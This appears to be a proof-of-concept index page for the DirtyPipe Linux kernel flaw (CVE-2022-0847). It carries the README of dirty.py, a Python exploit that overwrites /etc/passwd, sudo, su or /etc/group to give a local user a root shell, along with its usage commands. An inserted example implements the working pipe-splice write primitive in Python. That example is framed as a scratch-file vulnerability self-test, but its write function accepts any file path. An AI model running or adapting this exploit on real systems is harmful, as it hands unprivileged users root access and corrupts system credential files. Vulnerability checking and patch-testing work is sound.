POC details: bc2861c4ada75fa031c03ff68fe40f3c0d930365

Source
Related vulnerability
Title: Linux kernel security vulnerability (CVE-2022-0847)
Description: The Linux kernel is the kernel of Linux, the open-source operating system of the Linux Foundation (USA). The kernel has a security vulnerability that stems from the "flags" member of newly created pipe buffer structs not being properly initialised in the copy_page_to_iter_pipe and push_pipe functions. An unprivileged local user can exploit this to escalate privileges to root. Affected: Linux kernel 5.8 and later; fixed in 5.16.11, 5.15.25 and 5.10.102.
Description
A Python-based DirtyPipe (CVE-2022-0847) POC to pop a root shell
Introduction
# dirty.py

## Description
This is an exploit for the Linux kernel vulnerability [CVE-2022-0847](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0847) (DirtyPipe) discovered by [Max Kellermann](https://dirtypipe.cm4all.com/).

This code combines two existing DirtyPipe POCs into one:
- [febinrev](https://github.com/febinrev/dirtypipez-exploit)
	- Overwrites the sudo binary to pop a root shell directly
- [eremus-dev](https://github.com/eremus-dev/Dirty-Pipe-sudo-poc)
	- A direct port of Kellermann's POC to Python

This code checks whether:
  - /etc/passwd can be overwritten to get a root shell
  - The sudo binary can be overwritten to get a root shell
  - The su binary can be overwritten to get a root shell
  - The current user can be added to the sudo group in /etc/group

It then runs the first option that is possible, in that order, and drops the user directly into a root shell.

For an excellent explanation of the vulnerability itself, see [Kellermann's writeup](https://dirtypipe.cm4all.com/).

## Getting Started

Requires Python 3.10 or newer on Linux, because the script uses os.splice, which was added to the os module in Python 3.10.

## Usage
```console
usage: dirty.py [-h] [--target {passwd,group,sudo,su}]

Use dirty pipe vulnerability to pop root shell

options:
  -h, --help            show this help message and exit
  --target {passwd,group,sudo,su}
                        The target read-only file to overwrite
```

### Examples
#### Try all targets until one works
```console
vulnerable@kali:~$ python dirty.py
```
#### Try a specific target
```console
vulnerable@kali:~$ python dirty.py --target passwd
```

## Cleanup

The script may write several files to /tmp: 
 - /tmp/backup_sudo
 - /tmp/backup_su
 - /tmp/passwd
 - /tmp/sh
 - /tmp/group

The generated files should be removed after execution, but removing them may require root access.

##  Dealing with errors

This exploit overwrites a page of the target file in the page cache, not the file on disk: the modified page is never marked dirty, so it is not written back (as long as that page was not already dirty for some other reason). If there is corruption or an error, you usually only need to wait until the page is evicted from the cache and re-read from disk, or reboot, to fix any problems. That being said, I bear no responsibility for damage done by this code, so please read carefully and hack responsibly. Be sure to check out Max Kellermann's writeup at cm4all.com as well.
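The following is an added example, not code from dirty.py or from Kellermann's repository. It serves two parts of this README: the primitive the script applies to /etc/passwd, sudo and su (fill and drain a pipe so every freed pipe_buffer keeps PIPE_BUF_FLAG_CAN_MERGE, splice one byte of a read-only file into the pipe, then write into the pipe, exactly the steps in Kellermann's writeup), and the recovery this section describes (the on-disk bytes are intact, so evicting the cached page is enough). It runs the primitive against a scratch file owned by the current user, which makes it a non-destructive "is this kernel vulnerable?" check that does not depend on distribution version strings (distros backport the fix, so `uname -r` alone is unreliable). Assumptions: page size is whatever sysconf reports, the sample file contents are constructed, and the host is Linux with Python 3.10+; elsewhere the checks return None. Function names are mine.

```python
"""Non-destructive DirtyPipe (CVE-2022-0847) self-test plus page-cache recovery.

Added example, not part of dirty.py.  Needs Linux and Python 3.10+ (os.splice).
"""
import fcntl
import os
import stat
import tempfile

# Assumed page size: what sysconf reports (4096 on most x86_64 hosts).
PAGE = os.sysconf("SC_PAGE_SIZE") if hasattr(os, "sysconf") else 4096


def prepare_pipe():
    """Return (read_fd, write_fd) of a pipe whose free slots all carry
    PIPE_BUF_FLAG_CAN_MERGE: fill it to capacity, then drain it.  The flag
    is set by normal pipe writes and survives the buffer being freed."""
    r, w = os.pipe()
    size = fcntl.fcntl(w, fcntl.F_GETPIPE_SZ)  # capacity in bytes
    chunk = b"\x00" * PAGE
    remaining = size
    while remaining > 0:  # fill: every pipe_buffer gets CAN_MERGE
        remaining -= os.write(w, chunk[:min(remaining, PAGE)])
    remaining = size
    while remaining > 0:  # drain: slots freed, stale flags left behind
        remaining -= len(os.read(r, min(remaining, PAGE)))
    return r, w


def dirty_pipe_write(path, offset, data):
    """Write `data` at `offset` of `path` through the DirtyPipe primitive.
    `path` is opened read-only.  Same limits as Kellermann's PoC: the offset
    must not be page-aligned, the write must stay inside one page and must
    not extend the file.  Returns the byte count written into the pipe."""
    if offset % PAGE == 0:
        raise ValueError("offset must not be on a page boundary")
    if offset % PAGE + len(data) > PAGE:
        raise ValueError("write must not cross a page boundary")
    fd = os.open(path, os.O_RDONLY)
    try:
        if offset + len(data) > os.fstat(fd).st_size:
            raise ValueError("write must not extend the file")
        r, w = prepare_pipe()
        try:
            # Splice the byte before `offset`: the new pipe_buffer points at
            # the page-cache page, and an unfixed kernel leaves CAN_MERGE set.
            os.splice(fd, w, 1, offset_src=offset - 1)
            # Vulnerable kernel: merged into the page-cache page of the file.
            # Fixed kernel: just another byte sitting in the pipe.
            return os.write(w, data)
        finally:
            os.close(r)
            os.close(w)
    finally:
        os.close(fd)


def drop_file_cache(path):
    """Evict `path` from the page cache so the next read comes from disk.
    Only a readable fd is needed, so this works on /etc/passwd without root.
    The hint is advisory (dirty, mapped or in-flight pages are kept, and on
    tmpfs the cache *is* the file), hence the README's wait-or-reboot advice."""
    if not hasattr(os, "posix_fadvise"):
        return None
    fd = os.open(path, os.O_RDONLY)
    try:
        os.posix_fadvise(fd, 0, 0, os.POSIX_FADV_DONTNEED)  # length 0 = to EOF
        return True
    finally:
        os.close(fd)


def self_test():
    """Return (vulnerable, recovered) for this kernel using a scratch file,
    or None where os.splice is missing or splice/fadvise is not permitted."""
    if not hasattr(os, "splice"):
        return None
    original = b"root:x:0:0:root:/root:/bin/bash\n"  # constructed sample line
    marker = b"DIRTY"
    fd, path = tempfile.mkstemp()
    try:
        os.write(fd, original)
        os.fsync(fd)  # clean page: a hit stays in RAM and never reaches disk
        os.close(fd)
        os.chmod(path, stat.S_IRUSR)  # read-only, like /etc/passwd for a user
        try:
            dirty_pipe_write(path, 1, marker)
            with open(path, "rb") as f:
                vulnerable = f.read()[1:1 + len(marker)] == marker
            drop_file_cache(path)
            with open(path, "rb") as f:
                recovered = f.read() == original
        except OSError:
            return None
        return vulnerable, recovered
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print("self-test:", self_test())
```

On a patched kernel `self_test()` returns `(False, True)`; on a vulnerable one the first element is `True`, and the second shows whether dropping the cached page brought the original bytes back (it will not on tmpfs, where there is no separate on-disk copy to fall back to).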

## Acknowledgements

- [Max Kellermann](https://dirtypipe.cm4all.com/)
- [febinrev](https://github.com/febinrev/dirtypipez-exploit)
- [eremus-dev](https://github.com/eremus-dev/Dirty-Pipe-sudo-poc)
File snapshot

```console
[4.0K] /data/pocs/bc2861c4ada75fa031c03ff68fe40f3c0d930365
├── [ 14K] dirty.py
├── [1.2K] LICENSE
└── [2.4K] README.md

0 directories, 3 files
```